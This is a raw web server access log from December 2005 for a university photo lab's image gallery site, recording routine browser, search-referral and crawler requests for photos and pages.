198.31.97.254 - - [16/Dec/2005:14:16:51 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
69.178.43.49 - - [16/Dec/2005:14:16:51 -0900] "GET /gallery/panoramas/panoanchkenaipen.html HTTP/1.1" 200 12090 "http://www.google.com/search?q=anchorage+panoramic+photo&hl=en&hs=moN&lr=lang_en&client=firefox-a&rls=org.mozilla:en-US:official_s&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:51 -0900] "GET /index_files/lib.css HTTP/1.1" 200 2634 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:54 -0900] "GET /index_files/title.jpg HTTP/1.1" 200 5438 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:54 -0900] "GET /index_files/empty.gif HTTP/1.1" 200 45 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:54 -0900] "GET /index_files/small.dps.jpg HTTP/1.1" 200 5830 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:56 -0900] "GET /index_files/small.jpg HTTP/1.1" 200 2294 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:56 -0900] "GET /index_files/small_002.jpg HTTP/1.1" 200 1351 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:56 -0900] "GET /index_files/small_003.jpg HTTP/1.1" 200 1521 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:54 -0900] "GET /index_files/apr.jpg HTTP/1.1" 200 6015 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:16:56 -0900] "GET /gallery/panoramas/smalljpegs/1964-0075-00313.jpg HTTP/1.1" 200 31280 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:00 -0900] "GET /gallery/panoramas/smalljpegs/1964-0075-00319.jpg HTTP/1.1" 200 30914 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:09 -0900] "GET /index_files/ahs.jpg HTTP/1.1" 200 19341 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
68.142.249.104 - - [16/Dec/2005:14:17:09 -0900] "GET /gallery/photos/19940070/1/pages/1994-0070-00171.html HTTP/1.0" 200 5959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.178.43.49 - - [16/Dec/2005:14:17:11 -0900] "GET /gallery/panoramas/smalljpegs/1988-0051-00013.jpg HTTP/1.1" 200 34546 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:03 -0900] "GET /gallery/panoramas/smalljpegs/1988-0051-00009.jpg HTTP/1.1" 200 33523 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:16 -0900] "GET /gallery/panoramas/smalljpegs/2001-0143-00001.jpg HTTP/1.1" 200 31263 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:18 -0900] "GET /gallery/panoramas/smalljpegs/2001-0143-00002.jpg HTTP/1.1" 200 31732 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:26 -0900] "GET /gallery/panoramas/smalljpegs/2001-0143-00003.jpg HTTP/1.1" 200 29059 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:14 -0900] "GET /gallery/panoramas/smalljpegs/1964-0075-00308.jpg HTTP/1.1" 200 31450 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:38 -0900] "GET /index_files/bluebear.gif HTTP/1.1" 200 1263 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:52 -0900] "GET /index_files/sitemap.gif HTTP/1.1" 200 1503 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:52 -0900] "GET /index_files/bar.gif HTTP/1.1" 200 342 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:17:36 -0900] "GET /gallery/panoramas/smalljpegs/1964-0075-00307.jpg HTTP/1.1" 200 33461 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:18:19 -0900] "GET /index_files/dps.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:21:17 -0900] "GET /gallery/panoramas/images/1964-0075-00313.jpg HTTP/1.1" 200 69484 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:22:49 -0900] "GET /gallery/panoramas/images/1964-0075-00319.jpg HTTP/1.1" 200 118812 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
66.249.65.35 - - [16/Dec/2005:14:26:40 -0900] "HEAD /store/photos/largejpegs/(147)1989-0166-00777.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
87.1.219.53 - - [16/Dec/2005:14:28:45 -0900] "GET /store/maps.html HTTP/1.1" 301 349 "http://images.google.it/imgres?imgurl=http://photolab.elmer.uaf.edu/store/maps/large%2520jpegs/(021)%2520G3210%25201816%2520B93.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/maps.html&h=1500&w=1280&sz=337&tbnid=hUlN3HZpd0kJ:&tbnh=150&tbnw=128&hl=it&start=1&prev=/images%3Fq%3Datlante%2Bgeografico%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Dit%26lr%3D%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official_s%26sa%3DG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1"
81.70.93.228 - - [16/Dec/2005:14:29:40 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.0" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; NN5.0.600.15; SV1; .NET CLR 2.0.50727)"
69.178.43.49 - - [16/Dec/2005:14:31:25 -0900] "GET /index_files/inform.gif HTTP/1.1" 200 70 "http://photolab.elmer.uaf.edu/gallery/photogallery.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:31:25 -0900] "GET /index_files/new01.gif HTTP/1.1" 200 1016 "http://photolab.elmer.uaf.edu/gallery/photogallery.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:31:25 -0900] "GET /gallery/photogallery.html HTTP/1.1" 200 43150 "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial_s&hl=en&q=%22Ralph+MacKay%22+Anchorage+photo&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:32:23 -0900] "GET /gallery/index.html HTTP/1.1" 200 7386 "http://photolab.elmer.uaf.edu/gallery/photogallery.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
69.178.43.49 - - [16/Dec/2005:14:32:27 -0900] "GET /gallery/panogallery.html HTTP/1.1" 200 8652 "http://photolab.elmer.uaf.edu/gallery/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
12.217.238.221 - - [16/Dec/2005:14:32:27 -0900] "GET /store/people.html HTTP/1.1" 301 351 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(040)1958-1026-01700.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=1000&w=762&sz=136&tbnid=muofWG5zZScJ:&tbnh=149&tbnw=113&hl=en&start=3&prev=/images%3Fq%3Deskimo%26svnum%3D10%26hl%3Den%26lr%3D%26client%3Dsafari%26rls%3Den%26sa%3DN" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312"
12.217.238.221 - - [16/Dec/2005:14:32:29 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(040)1958-1026-01700.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=1000&w=762&sz=136&tbnid=muofWG5zZScJ:&tbnh=149&tbnw=113&hl=en&prev=/images%3Fq%3Deskimo%26svnum%3D10%26hl%3Den%26lr%3D%26client%3Dsafari%26rls%3Den%26sa%3DN&frame=small" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312"
69.178.43.49 - - [16/Dec/2005:14:33:04 -0900] "GET /store/panoramas.html HTTP/1.1" 301 354 "http://photolab.elmer.uaf.edu/gallery/panoramas/panoanchkenaipen.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
66.249.65.35 - - [16/Dec/2005:14:35:11 -0900] "HEAD /store/photos/thumbnails/1964-0029-00313.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
66.249.65.35 - - [16/Dec/2005:14:36:03 -0900] "HEAD /store/photos/smalljpegs/(039)1958-1026-02147.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
68.61.193.218 - - [16/Dec/2005:14:40:06 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://profile.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=23572191" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; acc=jocker)"
69.111.177.187 - - [16/Dec/2005:14:41:13 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
24.51.103.8 - - [16/Dec/2005:14:43:43 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=188341" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.212.224.161 - - [16/Dec/2005:14:45:05 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00907.jpg HTTP/1.0" 200 46706 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
68.142.251.148 - - [16/Dec/2005:14:47:11 -0900] "GET /robots.txt HTTP/1.0" 200 96 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.251.165 - - [16/Dec/2005:14:47:12 -0900] "GET /gallery/photos/19581026/21/pages/1958-1026-02142.html HTTP/1.0" 200 2092 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.213.120.154 - - [16/Dec/2005:14:48:03 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.212.224.161 - - [16/Dec/2005:14:48:18 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00908.jpg HTTP/1.0" 200 42887 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
58.237.203.117 - - [16/Dec/2005:14:48:23 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.250.12.171 - - [16/Dec/2005:14:48:38 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)"
217.212.224.164 - - [16/Dec/2005:14:49:50 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00901.jpg HTTP/1.0" 200 41168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
217.212.224.149 - - [16/Dec/2005:14:51:25 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00909.jpg HTTP/1.0" 200 44644 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
68.142.250.122 - - [16/Dec/2005:14:53:40 -0900] "GET /gallery/photos/19940070/0/pages/1994-0070-00001.html HTTP/1.0" 200 5844 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.35 - - [16/Dec/2005:14:54:30 -0900] "HEAD /store/photos/thumbnails/896-055.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
217.212.224.149 - - [16/Dec/2005:14:56:12 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00902.jpg HTTP/1.0" 200 22137 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
217.212.224.164 - - [16/Dec/2005:14:57:48 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00903.jpg HTTP/1.0" 200 42438 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
68.142.249.48 - - [16/Dec/2005:14:57:58 -0900] "GET /gallery/photos/19640074/pages/1964-0074-00134.html HTTP/1.0" 200 5044 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.188.84.145 - - [16/Dec/2005:14:58:05 -0900] "GET /index_files/aprbrown.jpg HTTP/1.1" 200 5509 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
194.74.163.209 - - [16/Dec/2005:14:58:49 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
86.128.16.23 - - [16/Dec/2005:15:00:22 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.212.224.149 - - [16/Dec/2005:15:00:57 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00904.jpg HTTP/1.0" 200 59996 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
66.249.65.35 - - [16/Dec/2005:15:01:28 -0900] "HEAD /store/photos/smalljpegs/(067)1989-0166-00462.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
217.212.224.149 - - [16/Dec/2005:15:02:33 -0900] "GET /gallery/photos/19750084/03/images/1975-0084-00316.jpg HTTP/1.0" 200 101409 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
217.212.224.164 - - [16/Dec/2005:15:04:09 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00905.jpg HTTP/1.0" 200 44938 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
66.249.65.35 - - [16/Dec/2005:15:07:14 -0900] "HEAD /store/photos/smalljpegs/(144)1974-0027-00525.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
81.207.31.209 - - [16/Dec/2005:15:11:35 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://beusichem.web-log.nl/categorie/4810" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.212.224.164 - - [16/Dec/2005:15:12:01 -0900] "GET /gallery/photos/20040111/09/images/2004-0111-00906.jpg HTTP/1.0" 200 51681 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
192.91.247.213 - - [16/Dec/2005:15:12:31 -0900] "GET /index_files/aprbrown.jpg HTTP/1.0" 200 5509 "http://www.alaska.net/~johnd/urban/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
203.1.218.18 - - [16/Dec/2005:15:13:42 -0900] "GET /store/people.html HTTP/1.0" 301 351 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(083)1989-0166-00380.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=1000&w=755&sz=139&tbnid=t4toWEdZw2kJ:&tbnh=149&tbnw=112&hl=en&start=3&prev=/images%3Fq%3Dfamous%2Bpeople%2Bbaby%2Bphotos%26svnum%3D10%26hl%3Den%26lr%3D%26sa%3DG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.142.251.148 - - [16/Dec/2005:15:15:09 -0900] "GET /robots.txt HTTP/1.0" 200 96 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.249.32 - - [16/Dec/2005:15:15:09 -0900] "GET /gallery/photos/19940070/3/pages/1994-0070-00391.html HTTP/1.0" 200 5959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.212.224.159 - - [16/Dec/2005:15:15:11 -0900] "GET /robots.txt HTTP/1.0" 200 96 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
217.212.224.164 - - [16/Dec/2005:15:15:11 -0900] "GET /gallery/photos/19750084/03/images/1975-0084-00319.jpg HTTP/1.0" 200 50226 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
68.142.251.184 - - [16/Dec/2005:15:21:52 -0900] "GET /gallery/photos/20040111 HTTP/1.0" 301 360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.251.184 - - [16/Dec/2005:15:21:52 -0900] "GET /gallery/photos/20040111/ HTTP/1.0" 200 2054 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.212.224.164 - - [16/Dec/2005:15:22:42 -0900] "GET /gallery/photos/19750084/03/images/1975-0084-00320.jpg HTTP/1.0" 200 80680 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
217.212.224.164 - - [16/Dec/2005:15:25:44 -0900] "GET /gallery/photos/19750084/03/images/1975-0084-00321.jpg HTTP/1.0" 200 38570 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)"
83.104.250.86 - - [16/Dec/2005:15:27:22 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.7.166.168 - - [16/Dec/2005:15:28:23 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.0" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
207.144.54.185 - - [16/Dec/2005:15:30:12 -0900] "GET /index_files/aprbrown.jpg HTTP/1.1" 200 5509 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
209.157.142.131 - - [16/Dec/2005:15:30:20 -0900] "GET /store/photos/largejpegs/(057)1972-0071-00823.jpg HTTP/1.1" 301 382 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=21524269" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
67.40.217.85 - - [16/Dec/2005:15:32:41 -0900] "GET /store/photos/largejpegs/(057)1972-0071-00823.jpg HTTP/1.1" 301 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH; MPLUS)"
67.40.217.85 - - [16/Dec/2005:15:32:53 -0900] "GET /store/photos/largejpegs/(057)1972-0071-00823.jpg HTTP/1.1" 301 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH; MPLUS)"
86.82.73.102 - - [16/Dec/2005:15:33:13 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
137.53.45.163 - - [16/Dec/2005:15:36:02 -0900] "GET /store/people.html HTTP/1.1" 301 351 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(145)1972-0071-02415.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=578&w=1000&sz=89&tbnid=9d9i9ttDbU8J:&tbnh=86&tbnw=149&hl=en&start=44&prev=/images%3Fq%3Dsanta%2Band%2Breindeer%26start%3D40%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Den%26lr%3D%26rls%3DGGLG,GGLG:2005-24,GGLG:en%26sa%3DN" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
137.53.45.163 - - [16/Dec/2005:15:36:04 -0900] "GET /store/photos/largejpegs/(145)1972-0071-02415.jpg HTTP/1.1" 301 382 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(145)1972-0071-02415.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=578&w=1000&sz=89&tbnid=9d9i9ttDbU8J:&tbnh=86&tbnw=149&hl=en&prev=/images%3Fq%3Dsanta%2Band%2Breindeer%26start%3D40%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Den%26lr%3D%26rls%3DGGLG,GGLG:2005-24,GGLG:en%26sa%3DN&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
137.53.45.163 - - [16/Dec/2005:15:36:09 -0900] "GET /store/photos/largejpegs/(145)1972-0071-02415.jpg HTTP/1.1" 301 382 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(145)1972-0071-02415.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=578&w=1000&sz=89&tbnid=9d9i9ttDbU8J:&tbnh=86&tbnw=149&hl=en&prev=/images%3Fq%3Dsanta%2Band%2Breindeer%26start%3D40%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Den%26lr%3D%26rls%3DGGLG,GGLG:2005-24,GGLG:en%26sa%3DN&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
68.142.250.102 - - [16/Dec/2005:15:38:14 -0900] "GET /gallery/photos/19940070/1/pages/1994-0070-00128.html HTTP/1.0" 200 5959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET / HTTP/1.1" 200 8969 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/dps.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/lib.css HTTP/1.1" 200 2634 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/apr.jpg HTTP/1.1" 200 6015 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/empty.gif HTTP/1.1" 200 45 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/title.jpg HTTP/1.1" 200 5438 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/small.jpg HTTP/1.1" 200 2294 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/small_002.jpg HTTP/1.1" 200 1351 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/small_003.jpg HTTP/1.1" 200 1521 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
